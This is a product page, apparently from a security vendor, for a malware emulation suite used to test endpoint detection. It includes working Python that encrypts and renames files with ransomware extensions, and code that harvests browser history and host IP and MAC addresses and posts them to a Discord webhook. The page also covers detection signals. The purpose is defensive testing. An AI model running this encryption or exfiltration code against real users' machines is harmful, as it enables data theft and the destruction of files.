Malware Sim


This tool suite emulates malware behaviour in order to evaluate EDR/EPP performance and detection capabilities. It should not present any danger: its behaviour is known because we coded it from scratch, published the source code, and had it security code-reviewed.

The two available tools are:

  1. A ransomware emulator
  2. An information stealer emulator

Usage

You can download the binaries: here.

Once downloaded, extract the "stresstest-windows-executable.zip" archive in a directory of your choice, then run the executables. The binaries are standalone, you do not need to install anything else.

After you have run the test, you can simply delete the "testdir" directory that was created as well as the binaries themselves.

Ransomware emulation

This first tool is composed of 3 binaries:

  • Step 1:

step_1_create_dummy_files.exe

The binary generates dummy files with various extensions (txt, pdf, png, xlsx...), they contain their own path and filename. The dummy files can be found in the "testdir" directory that is created where you run the binary.

  • Step 2:

step_2_encrypt_files.exe

This binary encrypts the content of the dummy files with a randomly generated 16-byte key. It renames the files and changes their extensions; all of the new extensions are ones used by known ransomware families. So that the files can be decrypted afterwards (optional), the key is stored in a file named "encryption_key.txt" in the same directory as testdir, and the original filenames are stored in a Python pickle file named "original_filenames.pkl" so they can be restored. *** This step should trigger your EPP/EDR. ***

  • Step 3 (optional):

step_3_decrypt_files.exe

This binary decrypts the files and restores their original name and extension.
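The three steps above, condensed into one script. This is an added example, not the project's own code. Its assumptions: the cipher is a SHA-256 counter-mode keystream so that it runs with the standard library only (a production tool would use AES); the original-name map is written as JSON rather than the pickle file the real tool uses, because loading a pickle executes whatever the file contains; the dummy extensions and the three ransomware extensions (.locky, .wncry, .cerber) are lists I chose; and the dummy content is the file's own path repeated so the files are large enough for the entropy check to be meaningful. The entropy helper shows one of the signals an EDR keys on: the rewritten files go from a few bits per byte to nearly 8.

```python
import hashlib
import json
import math
import secrets
import tempfile
from collections import Counter
from pathlib import Path

# Constructed lists for this example (assumptions, not the project's):
DUMMY_EXTENSIONS = ["txt", "pdf", "png", "xlsx", "docx"]
# Extensions that real ransomware families have appended to victim files.
RANSOM_EXTENSIONS = [".locky", ".wncry", ".cerber"]


def dummy_content(path: Path) -> str:
    """The file's own path, repeated so the file is a few KiB (assumption)."""
    return (str(path.resolve()) + "\n") * 100


def create_dummy_files(testdir: Path, count: int = 10) -> list:
    """Step 1: write `count` dummy files whose content identifies them."""
    testdir.mkdir(parents=True, exist_ok=True)
    paths = []
    for i in range(count):
        p = testdir / f"file_{i}.{DUMMY_EXTENSIONS[i % len(DUMMY_EXTENSIONS)]}"
        p.write_text(dummy_content(p))
        paths.append(p)
    return paths


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream with SHA-256 as the PRF (stdlib-only stand-in
    for AES-CTR; the (key, nonce) pair must never be reused)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(data: bytes, key: bytes, nonce: bytes) -> bytes:
    """Symmetric: the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: text sits around 4, encrypted output close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def encrypt_files(testdir: Path, workdir: Path) -> dict:
    """Step 2: encrypt every file under testdir with a random 16-byte key,
    rename it to a random name with a ransomware extension, and save the key
    and the original-name map beside testdir so Step 3 can undo it."""
    key = secrets.token_bytes(16)
    name_map = {}
    for i, p in enumerate(sorted(testdir.iterdir())):
        nonce = secrets.token_bytes(16)
        new_name = secrets.token_hex(8) + RANSOM_EXTENSIONS[i % len(RANSOM_EXTENSIONS)]
        ciphertext = xor_crypt(p.read_bytes(), key, nonce)
        (testdir / new_name).write_bytes(nonce + ciphertext)  # nonce prefixed
        p.unlink()
        name_map[new_name] = p.name
    (workdir / "encryption_key.txt").write_text(key.hex())
    (workdir / "original_filenames.json").write_text(json.dumps(name_map))
    return name_map


def decrypt_files(testdir: Path, workdir: Path) -> int:
    """Step 3: restore content, names and extensions; returns files restored."""
    key = bytes.fromhex((workdir / "encryption_key.txt").read_text())
    name_map = json.loads((workdir / "original_filenames.json").read_text())
    for new_name, original in name_map.items():
        blob = (testdir / new_name).read_bytes()
        nonce, ciphertext = blob[:16], blob[16:]
        (testdir / original).write_bytes(xor_crypt(ciphertext, key, nonce))
        (testdir / new_name).unlink()
    return len(name_map)


def run_emulation(workdir: Path) -> dict:
    """Run the three steps in order and report what an EDR would have seen."""
    testdir = workdir / "testdir"
    originals = create_dummy_files(testdir)
    plain_entropy = max(shannon_entropy(p.read_bytes()) for p in originals)
    name_map = encrypt_files(testdir, workdir)
    cipher_entropy = min(shannon_entropy(p.read_bytes()) for p in testdir.iterdir())
    restored = decrypt_files(testdir, workdir)
    return {"renamed": len(name_map), "restored": restored,
            "plain_entropy": plain_entropy, "cipher_entropy": cipher_entropy,
            "intact": all(p.read_text() == dummy_content(p) for p in originals)}


def demo_ransomware() -> dict:
    """Run the whole emulation inside a temporary directory and clean it up."""
    with tempfile.TemporaryDirectory() as d:
        return run_emulation(Path(d))


if __name__ == "__main__":
    print(demo_ransomware())
```

Running it against a real EDR, the parts worth watching in the telemetry are the burst of rename-plus-rewrite operations, the extension changes to known ransomware suffixes, and the entropy jump of the written data; the key and name-map files left next to testdir are the same artefacts the real tool leaves for Step 3.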

Information stealer emulation

This tool requires you to set up a webhook on a private Discord server in order to receive the information "stolen" from you.

You can find a tutorial: here.

This second tool is a standalone binary:

steal_information.exe

This binary first prompts you for the webhook URL. It then gathers information from your computer and sends it to the webhook you provided.

The information collected is the following:

  • IP address
  • MAC address
  • location
  • browser history (last 25 visited sites)
  • browser bookmarks

In a real-world scenario the webhook would be controlled by the attacker and its URL would not be entered by the victim. Real infostealers usually also steal cookies, passwords, sensitive files, etc.
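The collection and exfiltration steps above, written out as an added example that is not the project's code. It assumes a Chromium-style browser history: Chrome keeps it in an SQLite file named "History" whose "urls" table stores last_visit_time as microseconds since 1601-01-01 (the WebKit epoch), and the live file is locked while the browser runs, so it is copied before being read. The sample History file is constructed inline with only the columns the query needs and made-up sites; the IP and MAC come from the local host; geolocation needs an external lookup and is left out so the example runs offline; and nothing is sent unless you pass a webhook URL, which the caller supplies just as the real tool prompts for it.

```python
import json
import shutil
import socket
import sqlite3
import tempfile
import urllib.request
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Chrome's History file stores timestamps as microseconds since the WebKit
# epoch, not the Unix epoch; converting them wrongly is a classic mistake.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(microseconds: int) -> datetime:
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def datetime_to_webkit(dt: datetime) -> int:
    return int((dt - WEBKIT_EPOCH) / timedelta(microseconds=1))


def build_sample_history(path: Path, rows: int = 40) -> None:
    """Constructed stand-in for a Chrome History file: only the columns the
    query below needs, filled with made-up sites. Not real browsing data."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE urls(id INTEGER PRIMARY KEY, url LONGVARCHAR, "
                "title LONGVARCHAR, visit_count INTEGER, last_visit_time INTEGER)")
    now = datetime.now(timezone.utc)
    con.executemany(
        "INSERT INTO urls(url, title, visit_count, last_visit_time) VALUES (?,?,?,?)",
        [(f"https://site{i}.example/", f"Site {i}", 1,
          datetime_to_webkit(now - timedelta(minutes=i))) for i in range(rows)])
    con.commit()
    con.close()


def last_visited(history_path: Path, limit: int = 25) -> list:
    """Return the `limit` most recently visited sites. The file is copied
    first because the browser holds it locked while running; that copy of
    User Data\\Default\\History is itself something an EDR can watch for."""
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / "History"
        shutil.copy2(history_path, copy)
        con = sqlite3.connect(f"file:{copy.as_posix()}?mode=ro", uri=True)
        rows = con.execute("SELECT url, title, last_visit_time FROM urls "
                           "ORDER BY last_visit_time DESC LIMIT ?", (limit,)).fetchall()
        con.close()
    return [{"url": u, "title": t, "last_visit": webkit_to_datetime(ts).isoformat()}
            for u, t, ts in rows]


def collect_host_info() -> dict:
    """Hostname, local IP and MAC; any lookup failure is reported, not fatal."""
    hostname = socket.gethostname()
    try:
        ip = socket.gethostbyname(hostname)
    except OSError:
        ip = "unknown"
    mac = uuid.getnode()  # random 48-bit value if no interface can be read
    return {"hostname": hostname, "ip": ip,
            "mac": ":".join(f"{(mac >> s) & 0xff:02x}" for s in range(40, -1, -8))}


def build_webhook_payload(host: dict, history: list) -> dict:
    """Discord webhooks take a JSON body whose "content" is at most 2000
    characters; truncate rather than get an HTTP 400 back."""
    lines = [f"host={host['hostname']} ip={host['ip']} mac={host['mac']}"]
    lines += [f"{h['last_visit']} {h['url']}" for h in history]
    return {"content": "\n".join(lines)[:2000]}


def send_to_webhook(url: str, payload: dict) -> int:
    """POST the report; Discord answers 204 No Content on success."""
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "User-Agent": "MalwareSim-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def demo_infostealer(webhook_url: str = "") -> dict:
    """Build the sample History file, extract the last 25 sites and host
    info, and send only if a webhook URL was supplied."""
    with tempfile.TemporaryDirectory() as tmp:
        history = Path(tmp) / "History"
        build_sample_history(history)
        sites = last_visited(history)
    payload = build_webhook_payload(collect_host_info(), sites)
    status = send_to_webhook(webhook_url, payload) if webhook_url else None
    return {"sites": sites, "payload": payload, "status": status}


if __name__ == "__main__":
    print(json.dumps(demo_infostealer()["payload"], indent=2))
```

On the detection side, the two events to look for in this flow are a non-browser process copying or opening the browser's History database and an outbound HTTPS POST to discord.com/api/webhooks from a process that has no business talking to Discord.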

Here is a quick demonstration of the infostealer. On the left is the attacker's point of view; the terminal is on the victim's PC: DEMO_INFOSTEALER

Disclaimer

This tool suite is not intended for malicious use.

It is intended for security assessment purposes only.

If you use it for malicious purposes, you are breaking the law.

Learn more

This test is included in our "ransomware stress-test" service; you can learn more about it here: https://stresstest.bluetrusty.com/.
